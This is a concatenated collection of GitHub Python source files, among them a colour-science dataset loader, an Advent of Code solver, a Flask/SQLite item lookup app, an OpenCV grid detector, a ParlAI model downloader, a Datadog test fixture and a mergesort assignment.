np\nimport xlrd\nfrom colour import SpectralShape\nfrom colour.colorimetry import (\n LMS_ConeFundamentals,\n XYZ_ColourMatchingFunctions,\n)\nfrom colour.hints import Dict, NDArrayFloat\nfrom colour.utilities import as_float_array, tstack\n\nfrom colour_datasets.loaders import AbstractDatasetLoader\nfrom colour_datasets.records import datasets\nfrom colour_datasets.utilities import cell_range_values, index_to_column\n\n__author__ = \"Colour Developers\"\n__copyright__ = \"Copyright 2019 Colour Developers\"\n__license__ = \"BSD-3-Clause - https://opensource.org/licenses/BSD-3-Clause\"\n__maintainer__ = \"Colour Developers\"\n__email__ = \"colour-developers@colour-science.org\"\n__status__ = \"Production\"\n\n__all__ = [\n \"Specification_Asano2015\",\n \"DatasetLoader_Asano2015\",\n \"build_Asano2015\",\n]\n\n\nclass Specification_Asano2015(\n namedtuple(\n \"Specification_Asano2015\",\n (\"XYZ_2\", \"XYZ_10\", \"LMS_2\", \"LMS_10\", \"parameters\", \"others\"),\n )\n):\n \"\"\"\n Define the *Asano (2015)* specification for an observer.\n\n Parameters\n ----------\n XYZ_2\n *CIE XYZ* 2 degree colour matching functions.\n XYZ_10\n *CIE XYZ* 10 degree colour matching functions.\n LMS_2\n *LMS* 2 degree cone fundamentals.\n LMS_10\n *LMS* 10 degree cone fundamentals.\n parameters\n Observer parameters.\n others\n Other information.\n\n References\n ----------\n :cite:`Asano2015`\n \"\"\" # noqa: D405, D407, D410, D411\n\n def __new__(\n cls,\n XYZ_2: XYZ_ColourMatchingFunctions,\n XYZ_10: XYZ_ColourMatchingFunctions,\n LMS_2: LMS_ConeFundamentals,\n LMS_10: LMS_ConeFundamentals,\n parameters: NDArrayFloat,\n others: Dict | None = None,\n ):\n \"\"\"\n Return a new instance of the\n :class:`colour_datasets.loaders.asano2015.Specification_Asano2015`\n class.\n \"\"\"\n\n return super().__new__(\n cls, XYZ_2, XYZ_10, LMS_2, LMS_10, parameters, others\n )\n\n\nclass DatasetLoader_Asano2015(AbstractDatasetLoader):\n \"\"\"\n Define the *Asano (2015)* *Observer Function Database* dataset loader.\n\n Attributes\n ----------\n - :attr:`colour_datasets.loaders.DatasetLoader_Asano2015.ID`\n\n Methods\n -------\n - :meth:`colour_datasets.loaders.DatasetLoader_Asano2015.__init__`\n - :meth:`colour_datasets.loaders.DatasetLoader_Asano2015.load`\n - :meth:`colour_datasets.loaders.DatasetLoader_Asano2015.\\\nparse_workbook_Asano2015`\n\n References\n ----------\n :cite:`Asano2015`\n \"\"\"\n\n ID: str = \"3252742\"\n \"\"\"Dataset record id, i.e. the *Zenodo* record number.\"\"\"\n\n def __init__(self) -> None:\n super().__init__(datasets()[DatasetLoader_Asano2015.ID])\n\n def load(self) -> Dict[str, Dict[int, Specification_Asano2015]]:\n \"\"\"\n Sync, parse, convert and return the *Asano (2015)*\n *Observer Function Database* dataset content.\n\n Returns\n -------\n :class:`dict`\n *Asano (2015)* *Observer Function Database* dataset content.\n\n Examples\n --------\n >>> from colour_datasets.utilities import suppress_stdout\n >>> dataset = DatasetLoader_Asano2015()\n >>> with suppress_stdout():\n ... dataset.load()\n ...\n >>> len(dataset.content.keys())\n 2\n \"\"\"\n\n super().sync()\n\n self._content = {\n \"Categorical Observers\": {},\n \"Colour Normal Observers\": {},\n }\n\n # Categorical Observers\n workbook_path = os.path.join(\n self.record.repository, \"dataset\", \"Data_10CatObs.xls\"\n )\n\n observers = (1, 10)\n template = \"Asano 2015 {0} Categorical Observer No. {1} {2}\"\n for index, observer in self.parse_workbook_Asano2015(\n workbook_path, template, observers\n ).items():\n self._content[\"Categorical Observers\"][\n index\n ] = Specification_Asano2015(\n observer[\"XYZ_2\"],\n observer[\"XYZ_10\"],\n observer[\"LMS_2\"],\n observer[\"LMS_10\"],\n observer[\"parameters\"],\n )\n\n # Colour Normal Observers\n workbook_path = os.path.join(\n self.record.repository, \"dataset\", \"Data_151Obs.xls\"\n )\n\n observers = (1, 151)\n\n # Other Information\n column_in, column_out = (\n index_to_column(observers[0] - 1),\n index_to_column(observers[1]),\n )\n workbook = xlrd.open_workbook(workbook_path)\n values_data = cell_range_values(\n workbook.sheet_by_index(5), f\"{column_in}2:{column_out}9\"\n )\n values_data.extend(\n cell_range_values(\n workbook.sheet_by_index(5), f\"{column_in}12:{column_out}16\"\n )\n )\n values_transposed = np.transpose(values_data)\n header, values = values_transposed[0], values_transposed[1:]\n\n template = \"Asano 2015 {0} Colour Normal Observer No. {1} {2}\"\n for i, (index, observer) in enumerate(\n self.parse_workbook_Asano2015(\n workbook_path, template, observers\n ).items()\n ):\n self._content[\"Colour Normal Observers\"][\n index\n ] = Specification_Asano2015(\n observer[\"XYZ_2\"],\n observer[\"XYZ_10\"],\n observer[\"LMS_2\"],\n observer[\"LMS_10\"],\n observer[\"parameters\"],\n dict(zip(header, values[i])),\n )\n\n return self._content\n\n @staticmethod\n def parse_workbook_Asano2015(\n workbook: str, template: str, observers: tuple = (1, 10)\n ) -> Dict[str, Dict]:\n \"\"\"\n Parse given *Asano (2015)* *Observer Function Database* workbook.\n\n Parameters\n ----------\n workbook\n *Asano (2015)* *Observer Function Database* workbook path.\n template\n Template used to create the *CMFS* names.\n observers\n Observers range.\n\n Returns\n -------\n :class:`dict`\n *Asano (2015)* *Observer Function Database* workbook observer data.\n \"\"\"\n\n book = xlrd.open_workbook(workbook)\n\n # \"CIE XYZ\" and \"LMS\" CMFS.\n column_in, column_out = (\n index_to_column(observers[0] + 1),\n index_to_column(observers[1] + 1),\n )\n\n shape = SpectralShape(390, 780, 5)\n wavelengths = shape.range()\n data: Dict = {}\n\n for i, cmfs in enumerate(\n [\n (XYZ_ColourMatchingFunctions, \"XYZ\"),\n (LMS_ConeFundamentals, \"LMS\"),\n ]\n ):\n for j, degree in enumerate(\n [(2, \"2$^\\\\circ$\"), (10, \"10$^\\\\circ$\")]\n ):\n sheet = book.sheet_by_index(j + (i * 2))\n\n x = np.transpose(\n cell_range_values(sheet, f\"{column_in}3:{column_out}81\")\n )\n y = np.transpose(\n cell_range_values(sheet, f\"{column_in}82:{column_out}160\")\n )\n z = np.transpose(\n cell_range_values(sheet, f\"{column_in}161:{column_out}239\")\n )\n\n for k in range(observers[1]):\n observer = k + 1\n rgb = tstack([x[k], y[k], z[k]])\n if data.get(observer) is None:\n data[observer] = {}\n\n key = f\"{cmfs[1]}_{degree[0]}\"\n data[observer][key] = cmfs[0](\n rgb,\n domain=wavelengths,\n name=template.format(degree[0], observer, cmfs[1]),\n display_name=template.format(\n degree[0], observer, cmfs[1]\n ),\n )\n\n # Parameters\n column_in, column_out = (\n index_to_column(observers[0] - 1),\n index_to_column(observers[1]),\n )\n\n values = np.transpose(\n cell_range_values(\n book.sheet_by_index(4), f\"{column_in}2:{column_out}10\"\n )\n )\n header, values = values[0], values[1:]\n\n for i in range(observers[1]):\n observer = i + 1\n data[observer][\"parameters\"] = dict(\n zip(header, as_float_array(values[i]))\n )\n\n return data\n\n\n_DATASET_LOADER_ASANO2015: DatasetLoader_Asano2015 | None = None\n\"\"\"\nSingleton instance of the *Asano (2015)* *Observer Function Database* dataset\nloader.\n\"\"\"\n\n\ndef build_Asano2015(load: bool = True) -> DatasetLoader_Asano2015:\n \"\"\"\n Singleton factory that the builds *Asano (2015)*\n *Observer Function Database* dataset loader.\n\n Parameters\n ----------\n load\n Whether to load the dataset upon instantiation.\n\n Returns\n -------\n :class:`colour_datasets.loaders.DatasetLoader_Asano2015`\n Singleton instance of the *Asano (2015)* *Observer Function Database*\n dataset loader.\n\n References\n ----------\n :cite:`Asano2015`\n \"\"\"\n\n global _DATASET_LOADER_ASANO2015 # noqa: PLW0603\n\n if _DATASET_LOADER_ASANO2015 is None:\n _DATASET_LOADER_ASANO2015 = DatasetLoader_Asano2015()\n if load:\n _DATASET_LOADER_ASANO2015.load()\n\n return _DATASET_LOADER_ASANO2015\n","repo_name":"colour-science/colour-datasets","sub_path":"colour_datasets/loaders/asano2015.py","file_name":"asano2015.py","file_ext":"py","file_size_in_byte":10008,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"83"} +{"seq_id":"27034195621","text":"import torch\nfrom qpth.qp import QPFunction\n\ndef project2cone2(gradient, memories, margin=0.5, eps=1e-3):\n \"\"\"\n Solves the GEM dual QP described in the paper given a proposed\n gradient \"gradient\", and a memory of task gradients \"memories\".\n Overwrites \"gradient\" with the final projected update.\n input: gradient, p-vector\n input: memories, (t * p)-vector\n output: x, p-vector\n \"\"\"\n with torch.no_grad():\n t = memories.shape[0]\n _eye = torch.eye(t, device=gradient.device)\n G = -_eye\n h = torch.zeros(t, device=gradient.device) - margin\n \n while True:\n try:\n Q = memories @ memories.t()\n Q = (0.5 * (Q + Q.t()) + _eye * eps)\n p = (memories @ gradient)\n v = QPFunction(verbose=False)(Q, p, G, h, torch.zeros(0, device=gradient.device), torch.zeros(0, device=gradient.device))[0]\n break\n except:\n eps = eps * 10.\n \n x = (v @ memories) + gradient\n return x.detach()\n ","repo_name":"ShinhwanKang/BeGin","sub_path":"begin/algorithms/gem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"83"} +{"seq_id":"11536715488","text":"# aoc_template.py\n\nimport pathlib\nimport sys\nfrom aocd.models import Puzzle\n\npuzzle = Puzzle(year=2022, day=10)\n\ndef parse(puzzle_input):\n \"\"\"Parse input.\"\"\"\n return [i.split(' ') for i in puzzle_input.split('\\n')]\n\ndef part1(data):\n \"\"\"Solve part 1.\"\"\" \n cycle = 1\n register_X = 1\n\n signal_strength = 0\n\n for instr in data: \n if instr[0] == 'noop':\n cycle += 1\n elif instr[0] == 'addx':\n cycle += 1\n if cycle % 40 == 20:\n print(f\"cycle {cycle}, signal strength {cycle * register_X}\")\n signal_strength += cycle * register_X\n register_X += int(instr[1])\n cycle += 1\n else:\n raise ValueError(f\"instruction is unknown: {instr[0]}\")\n \n if cycle % 40 == 20:\n print(f\"cycle {cycle}, signal strength {cycle * register_X}\")\n signal_strength += cycle * register_X\n return signal_strength\n\ndef part2(data):\n \"\"\"Solve part 2.\"\"\"\n cycle = 0\n register_X = 1\n\n signal_strength = 0\n\n screen = \"\"\n\n for instr in data: \n if instr[0] == 'noop':\n if abs(cycle - register_X) < 2:\n screen += '#'\n else:\n screen += '.'\n cycle += 1\n if cycle == 40:\n screen += '\\n'\n cycle = 0\n elif instr[0] == 'addx':\n for i in range(2):\n if abs(cycle - register_X) < 2:\n screen += '#'\n else:\n screen += '.'\n cycle += 1\n if cycle == 40:\n screen += '\\n'\n cycle = 0\n if i == 1:\n register_X += int(instr[1])\n else:\n raise ValueError(f\"instruction is unknown: {instr[0]}\")\n return screen\n\ndef solve(puzzle_input):\n \"\"\"Solve the puzzle for the given input.\"\"\"\n data = parse(puzzle_input) \n solution1 = part1(data)\n solution2 = part2(data)\n return solution1, solution2\n\nif __name__ == \"__main__\":\n \"\"\"Main function.\"\"\"\n # either input via a file given in argument or via aoc input plugin\n if len(sys.argv) > 1:\n for path in sys.argv[1:]:\n print(f\"{path}:\")\n puzzle_input = pathlib.Path(path).read_text().strip()\n else:\n puzzle_input = puzzle.input_data\n\n print(f\"input: \\n {puzzle_input[:50]}\")\n solutions = solve(puzzle_input)\n print(\"\\n\".join(str(solution) for solution in solutions))\n ","repo_name":"hadrienjeanne/adventofcode","sub_path":"202210_Cathode-Ray_Tube/aoc202210.py","file_name":"aoc202210.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10354500924","text":"from django.urls import path\nfrom .views import post_SignUp, get_RegisteredUsers, post_UserInfo, post_EditUser, index\n\n\napp_name = 'application'\nurlpatterns = [\n path('', index, name='index'),\n path('signup.html', post_SignUp, name='sign_up'),\n path('edit/', post_EditUser, name='edit'),\n path('register/', get_RegisteredUsers, name='register'),\n path('info/', post_UserInfo, name='info'),\n]\n","repo_name":"FatemehMomeni/ADB_hw2","sub_path":"webApp/application/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37179866872","text":"import os\nimport sqlite3\nimport re\nfrom flask import request\n#from flask import g\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\ndb_path = os.path.dirname(__file__) + '/arctic.db'\n\ndef sql_execute(sql, conn=None, as_dictionary=False):\n if not conn:\n try:\n conn = sqlite3.connect(db_path)\n except sqlite3.Error:\n return\n try:\n cur = conn.cursor()\n cur.execute(sql)\n if as_dictionary:\n cols = [i[0] for i in cur.description]\n rows = [dict(zip(cols,row)) for row in cur]\n else:\n rows = cur.fetchall()\n finally:\n conn.close()\n return rows\n\n@app.route('/')\ndef index():\n result = sql_execute(\"select count(*) from Lore\")\n ct = list(result[0])[0]\n print(f'Total number of items is {ct}')\n return render_template(\"index.html\")\n\n@app.route('/get_lores')\ndef get_lores():\n text = request.args.get('keywords')\n spl = re.split(\"[\\.\\s]\", text.replace(\"'\", \"''\"))\n sql = \"select * from Lore where \" + \"object_name like '%\" + \"%' and object_name like '%\".join(spl)\n sql += \"%'\"\n\n results = sql_execute(sql, as_dictionary=True)\n\n results_string = \"\"\n result_count = 0\n for row in results:\n line = f'
'\n        result_count+=1\n        line += f'Object {str(row[\"OBJECT_NAME\"])} 
'\n\n if row[\"ITEM_TYPE\"] is not None:\n line += f'Item Type: {str(row[\"ITEM_TYPE\"])}
'\n if row[\"MAT_CLASS\"] is not None and row[\"MATERIAL\"] is not None:\n line += f'Mat Class: {str(row[\"MAT_CLASS\"]):<10} Material: {str(row[\"MATERIAL\"])}
'\n if row[\"WEIGHT\"] is not None and row[\"ITEM_VALUE\"] is not None:\n line += f'Weight : {str(row[\"WEIGHT\"]):<10} Value : {str(row[\"ITEM_VALUE\"])}
'\n if row[\"CAPACITY\"] is not None:\n line += f'Capacity : {str(row[\"CAPACITY\"])}
'\n if row[\"AFFECTS\"] is not None:\n for affect in re.split(\",\", row[\"AFFECTS\"]):\n line += f'Affects : {str(affect.strip())}
'\n if row[\"EFFECTS\"] is not None:\n for effect in re.split(\",\", row[\"EFFECTS\"]):\n line += f'Effects : {str(effect.strip())}
'\n if row[\"ITEM_IS\"] is not None:\n line += f'Item is : '\n for item_is in re.split(\" \", row[\"ITEM_IS\"]):\n line += f'{item_is} '\n line += f'
'\n if row[\"CHARGES\"] is not None:\n line += f'Charges : {str(row[\"CHARGES\"])}
'\n if row[\"ITEM_LEVEL\"] is not None:\n line += f'Level : {row[\"ITEM_LEVEL\"]}
'\n if row[\"APPLY\"] is not None:\n line += f'Apply : {str(row[\"APPLY\"])}
'\n if row[\"RESTRICTS\"] is not None:\n line += f'Restricts: '\n for restrition in re.split(\" \", row[\"RESTRICTS\"]):\n line += f'!{restrition} '\n line += f'
'\n if row[\"CLASS\"] is not None:\n line += f'Class : {row[\"CLASS\"]}
'\n if row[\"IMMUNE\"] is not None:\n line += f'Immune : '\n for immunity in re.split(\" \", row[\"IMMUNE\"]):\n line += f'{immunity} '\n line += f'
'\n if row[\"DAMAGE\"] is not None:\n line += f'Damage : {str(row[\"DAMAGE\"])}
'\n line += \"
***************
\"\n\n results_string += line + \"
\"\n\n return results_string\n","repo_name":"young24601/arctic_lore","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35997334803","text":"import numpy as np \nimport cv2\nfrom imutils.video import VideoStream\nimport sys\nfrom math import sqrt\n\nfilename = 'C:/Users/User/Rover-Trasher/image/1.jpg'\ncorners = []\nwhile True:\n vs = VideoStream(0)\n img = vs.read()\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )\n hsv_min = np.array((9, 62, 170), np.uint8)\n hsv_max = np.array((23, 101, 255), np.uint8)\n img = cv2.inRange(hsv, hsv_min, hsv_max)\n cv2.imshow('result', img)\n\n ch = cv2.waitKey(5)\n if ch == 27:\n cv2.imwrite(filename, img)\n print(\"saved\")\n break\n\n#img = cv2.imread(\"./image/1.jpg\")\ncorners = []\ndef coords_corner(x1, y1, x2, y2, i_left, i_right, j_left, j_right):\n global img\n for i in range(i_left, i_right):\n for j in range(j_left, j_right):\n if int(img[j][i][0]) == 255:\n if i < x1 and j < y1:\n x1 = i\n y1 = j\n elif i > x2 and j > y2:\n x2 = i\n y2 = j\n corners.append((x1 + abs(x1 - x2), y1 + abs(y1 - y2)))\n img = cv2.line(img, (x1,y1), (x2,y2), (255,0,0), 5)\n\nimg = cv2.imread(filename)\ncoords_corner(10000, 10000, 0, 0, 0, 320, 0, 240) # левый верхний\ncoords_corner(10000, 10000, 0, 0, 320, 640, 0, 240) # Правый верхний\ncoords_corner(10000, 10000, 0, 0, 0, 320, 240, 480) # Левый нижний\ncoords_corner(10000, 10000, 0, 0, 320, 640, 240, 480) # правый нижний\n#img = cv2.line(img, (corners[0][0], corners[0][1]), (corners[2][0], corners[2][1]), (0,0,255), 1)\n#img = cv2.line(img, (corners[1][0], corners[1][1]), (corners[3][0], corners[3][1]), (0,0,255), 1)\n\nimg = vs.read()\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )\nhsv_min = np.array((35, 83, 76), np.uint8)\nhsv_max = np.array((90, 255, 255), np.uint8)\nimg = cv2.inRange(hsv, hsv_min, hsv_max)\ncv2.imwrite(filename, img)\nimg = cv2.imread(filename)\n\n\n\n\nw, h = (4, 5) # i, j\npoints = []\nline_up = abs(corners[0][0] - corners[1][0]) // w\nline_down = abs(corners[2][0] - corners[3][0]) // w\ny_lines = [corners[0][1]]\nx_up = [corners[0][0] + line_up * i for i in range(w + 1)]\nx_down = [corners[2][0] + line_down * i for i in range(w + 1)]\npoints.append(x_up)\nfor i in range(w + 1):\n img = cv2.line(img, (x_up[i], corners[0][1]), (x_down[i], corners[2][1]), (0,0,255), 1)\n #f.write(\" \".join(map(str, x_center)) + \"\\n\")\nage = 20\nage_dict = {0: 30, 1: 45, 2: 45, 3: 50}\nfor i in range(h - 1):\n a = []\n for j in range(w + 1):\n Rab = sqrt((x_down[j] - x_up[j]) ** 2 + (corners[2][1] - corners[0][1]) ** 2)\n k = age / Rab\n Xc = int(x_up[j] + (x_down[j] - x_up[j]) * k)\n a.append(Xc)\n Yc = int(corners[0][1] + (corners[2][1] - corners[0][1]) * k)\n points.append(a)\n y_lines.append(Yc)\n age += age_dict[i] ############################ Откалибровать значение длины\n img = cv2.line(img, (a[0], Yc), (a[-1], Yc), (0,0,255), 1)\n\ncv2.imshow(\"image\", img)\npole = img\ncv2.waitKey(0)\ncv2.destroyAllWindows()\npoints.append(x_down)\ny_lines.append(corners[3][1])\ny_lines = sorted(list(set(y_lines)))\nprint(*points, sep=\"\\n\")\nprint(y_lines, 'Y')\nwhile True:\n img2 = pole[:]\n vs = VideoStream(0)\n img = vs.read()\n cv2.imwrite(filename, img)\n img = cv2.imread(filename)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )\n hsv_min = np.array((35, 83, 76), np.uint8)\n hsv_max = np.array((90, 255, 255), np.uint8)\n img = cv2.inRange(hsv, hsv_min, hsv_max)\n for i in range(w + 1):\n for j in range(h - 1):\n print(i, j)\n x1 = points[i][j]\n x2 = points[i + 1][j + 1]\n sqr = img\n print(x1, x2, y_lines[i], y_lines[i + 1])\n sqr = sqr[y_lines[i]:y_lines[i + 1], x1:x2]\n sqr = cv2.resize(sqr, (32, 32))\n #img2 = cv2.rectangle(img2, (x1, y_lines[i]), (x2, y_lines[i + 1]), (255, 255, 0), 2)\n if sum(sum(sqr)) > 300:\n print(\"Finded trash in\", i, j)\n img2 = cv2.rectangle(img2, (x1, y_lines[i]), (x2, y_lines[i + 1]), (0, 255, 0), 2)\n #cv2.imshow(\"image\", sqr)\n cv2.imshow(\"image\", img2)\n while True:\n ch = cv2.waitKey(5)\n if ch == 27:\n print(\"saved\")\n break\n \n \n\n\n\n \n","repo_name":"4-pm/SWTS-0.1","sub_path":"scearcher.py","file_name":"scearcher.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34232842750","text":"import os\nimport json\nfrom pathlib import Path\n\nfrom typing import List, Union\n\nfrom parlai.core.message import Message\nfrom parlai.core.agents import create_agent\nimport parlai.core.build_data as build_data\n\nPROJECT_HOME = Path(__file__).parent.parent.resolve()\nDATA_DIR = os.path.join(PROJECT_HOME, 'data')\n\nCANARY_MODEL_FILE = [\n build_data.DownloadableFile(\n 'https://storage.googleapis.com/ai2-mosaic-public/projects/prosocial-dialog/models/canary.tar.gz',\n 'canary.tar.gz',\n '33d264e73c389726f193b448a878275b45a91954a95ef4be988a1fba75712d60',\n zipped=True, from_google=False,\n ),\n]\n\ndef download(datapath, version='v1.0'):\n dpath = os.path.join(datapath, 'models', 'canary')\n\n if not build_data.built(dpath, version):\n print('[Downloading and building Canary: ' + dpath + ']')\n if build_data.built(dpath):\n # An older version exists, so remove these outdated files.\n build_data.remove_dir(dpath)\n build_data.make_dir(dpath)\n\n # Download the data.\n print(\"NOTE: Since Canary's size is 10GB, the download and extraction can take a long time.\")\n for downloadable_file in CANARY_MODEL_FILE:\n downloadable_file.download_file(dpath)\n\n # Mark the data as built.\n build_data.mark_done(dpath, version)\n\n return dpath\n\nclass Canary(object):\n def __init__(self):\n canary_dir = download(DATA_DIR)\n canary_meta_data = os.path.join(canary_dir, 'model.opt')\n with open(canary_meta_data) as f:\n opt = json.load(f)\n\n opt['skip_generation'] = False\n opt['model_file'] = os.path.join(canary_dir, 'model')\n self.agent = create_agent(opt)\n\n def chirp(self, input: Union[str, List]):\n if isinstance(input, str):\n input = [input]\n\n return self.get_batch_output(input)\n \n def get_output(self, input: str):\n return self.agent.respond(Message(text=input))\n\n def get_batch_output(self, batch_input: List[str]):\n message_batch = []\n for input in batch_input:\n message_batch.append(Message(text=input))\n\n return self.agent.batch_respond(message_batch)\n \n def reset(self):\n self.agent.reset()","repo_name":"skywalker023/prosocial-dialog","sub_path":"model/canary.py","file_name":"canary.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"83"} +{"seq_id":"11068297715","text":"# (C) Datadog, Inc. 2023-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\nimport copy\nimport os\nfrom unittest import mock\n\nimport pytest\n\nfrom datadog_checks.dcgm import DcgmCheck\nfrom datadog_checks.dev import docker_run\nfrom datadog_checks.dev.conditions import CheckDockerLogs, CheckEndpoints\n\nfrom . import common\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n compose_file = common.COMPOSE_FILE\n conditions = [\n CheckDockerLogs(identifier='caddy', patterns=['server running']),\n CheckEndpoints(common.INSTANCE[\"openmetrics_endpoint\"]),\n ]\n with docker_run(compose_file, conditions=conditions):\n yield {\n 'instances': [common.INSTANCE],\n }\n\n\n# For E2E and Unit testing:\n@pytest.fixture\ndef instance():\n return copy.deepcopy(common.INSTANCE)\n\n\n# For Unit Test:\n@pytest.fixture\ndef check(instance):\n return DcgmCheck('dcgm.', {}, [instance])\n\n\n@pytest.fixture()\ndef mock_metrics():\n f_name = os.path.join(os.path.dirname(__file__), 'fixtures', 'metrics.txt')\n with open(f_name, 'r') as f:\n text_data = f.read()\n with mock.patch(\n 'requests.get',\n return_value=mock.MagicMock(\n status_code=200, iter_lines=lambda **kwargs: text_data.split(\"\\n\"), headers={'Content-Type': \"text/plain\"}\n ),\n ):\n yield\n","repo_name":"DataDog/integrations-core","sub_path":"dcgm/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":820,"dataset":"github-code","pt":"83"} +{"seq_id":"26795180963","text":"from random import randint\nfin = open(\"c.txt\")\nfout = open(\"output.txt\", \"w\")\n\ninpKeys = list(map(int, fin.readline().rstrip('\\n').split()))\nstreetTime = {}\nstreetIntersections = {}\ncarPath = []\npathExist = {}\nstreetCount = {}\nfor i in range(inpKeys[2]):\n streetLine = list(fin.readline().rstrip('\\n').split())\n streetIntersections[streetLine[2]] = [int(streetLine[0]), int(streetLine[1])]\n streetTime[streetLine[2]] = streetLine[3]\nfor i in range(inpKeys[3]):\n carLine = list(fin.readline().rstrip('\\n').split())\n for i in range(1, len(carLine)):\n if(carLine[i] in streetCount):\n streetCount[carLine[i]]+=1\n else:\n streetCount[carLine[i]] = 1\n pathExist[carLine[i]] = True\n carPath.append(carLine)\n\nans = 0\ndone = []\nfor i in pathExist:\n if(streetIntersections[i][1] not in done):\n ans+=1\n done.append(streetIntersections[i][1])\n\n\nfout.write(str(ans) + '\\n')\ncurr = 0\nwhile(currmaxi):\n maxi = streetCount[i]\n resm = i\n for i in res:\n if(i == resm):\n fout.write(i+\" \"+str(rm)+'\\n')\n else:\n fout.write(i+\" \"+str(1)+'\\n')\n curr+=1\n\nfin.close()\nfout.close()","repo_name":"MrChepe09/Competitive-Programming-Codes","sub_path":"Google Hashcode 2021/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"83"} +{"seq_id":"6362126580","text":"# coding=utf-8\n# uliontse\n\n'''\n对互相有攻击性的动物分笼,笼要尽可能的少。\n'''\n\nfrom collections import deque,Iterable\nfrom pprint import pprint as ppt\n\ndef initM():\n attackGroup = {\n (0,5),(1,0),(1,4),(1,5),(1,7),(1,8),\n (3,4),(4,8),(5,2),(5,6),(6,2),(6,4),(8,3)\n }\n # 假设每个动物都有攻击对象或被攻击对象,都在attackGroup.\n # 现确定动物数量:\n def oneDim(L):\n for each in L:\n if not isinstance(each, Iterable):\n yield each\n else:\n yield from oneDim(each)\n N = len(set(oneDim(attackGroup)))\n M = [[0] * N for _ in range(N)]\n for i,j in attackGroup:\n M[i][j] = M[j][i] = 1\n return M\n\n\ndef division(M,n=None):\n if not n: n = len(M) #如果存在没有互相攻击的动物,那一般会给出动物数量\n res = []\n q = deque(range(n))\n pre = n\n\n while q:\n cur = q.popleft()\n if pre >= cur:\n res.append([])\n\n for i in res[-1]:\n if M[cur][i] == 1:\n q.append(cur)\n break\n else:\n res[-1].append(cur)\n pre = cur\n return res\n\n\nif __name__ == '__main__':\n M = initM()\n ppt(M)\n print(division(M))\n","repo_name":"0xr0ot/PY_self","sub_path":"algorithm/DataStructure/queue/queue_division.py","file_name":"queue_division.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"27591966958","text":"\"\"\"\nProject 1: Alphabetizer\nSpencer Cassetta\ncassett8 - A54379022\nCSE 260 - James Daly\n\"\"\"\nclass Person:\n \"\"\"\n Class : Person\n has a first name, last name, and email.\n built in functionality for <,>,= operators\n \"\"\"\n def __init__(self, first, last, email):\n self.first = first\n self.last = last\n self.email = email\n def __str__(self):\n return '{0} {1} <{2}>'.format(self.first, self.last, self.email)\n def __repr__(self):\n return '({0}, {1}, {2})'.format(self.first, self.last, self.email)\n def __eq__(self, other):\n return self.first == other.first and self.last == other.last and self.email == other.email\n\ndef order_first_name(a, b):\n \"\"\"\n Orders two people by their first names\n :param a: a Person\n :param b: a Person\n :return: True if a comes before b alphabetically and False otherwise\n \"\"\"\n # if a comes before b, then true\n if a.first < b.first:\n return True\n # if equal, compare with last name\n if a.first == b.first:\n return a.last < b.last\n # a does not come before b\n return False\ndef order_last_name(a, b):\n \"\"\"\n Orders two people by their last names\n :param a: a Person\n :param b: a Person\n :return: True if a comes before b alphabetically and False otherwise\n \"\"\"\n if a.last < b.last:\n return True\n # if equal, compare with first name\n if a.last == b.last:\n return a.first < b.first\n # a does not come before b\n return False\n\ndef is_alphabetized(roster, ordering):\n \"\"\"\n Checks whether the roster of names is alphabetized in the given order\n :param roster: a list of people\n :param ordering: a function comparing two elements\n :return: True if the roster is alphabetized and False otherwise\n \"\"\"\n # loop through roster\n for i in range(len(roster)-1):\n #if elements are equal, then continue\n if roster[i] == roster[i+1]:\n continue\n # if not in correct order,\n elif not ordering(roster[i], roster[i+1]):\n # then it is not sorted\n return False\n #made it all the way through list,\n # must be sorted\n return True\ndef merge(l, r, ordering):\n \"\"\"\n takes 2 lists and merges them into new list in sorted order\n :param l: a list of elements\n :param r: a list of elements\n :param ordering: a function comparing two elements\n :return: a sorted list containing both elements of r and l\n :return: the number of comparisons made\n inspired by psuedocode\n \"\"\"\n #declare variables, max length of lists,\n # and new list to store elements\n i, j, comp = 0, 0, 0\n n, m = len(l), len(r)\n new = []\n #loop through the lists as long as inbound\n while i < n and j < m:\n #else-if determines which element\n # is smaller and puts it in the new list first\n if ordering(l[i], r[j]):\n new.append(l[i])\n i += 1\n else:\n new.append(r[j])\n j += 1\n # a comparison was made\n comp += 1\n #finds list that didnt get iterated all the way\n # through and ammends the rest of it to the new list\n while j < len(r):\n new.append(r[j])\n j += 1\n while i < len(l):\n new.append(l[i])\n i += 1\n #return new list along with\n #number of comparisons made\n return (new, comp)\n\n\ndef mergesort(arr, ordering):\n \"\"\"\n uses recursion to break array into smallest components\n and merge all of them in sorted order using the merge function\n :param arr: a list of elements\n :param ordering: a function comparing two elements\n :return: a sorted version of roster\n :return: the number of comparisons made\n inspired by psuedocode given in lecture\n \"\"\"\n # if only 1 element,\n # then we are done breaking apart\n if len(arr) < 2:\n return (arr, 0)\n #breaks down list into smaller components\n #by breaking it into halves at a time\n #stores halves into l and 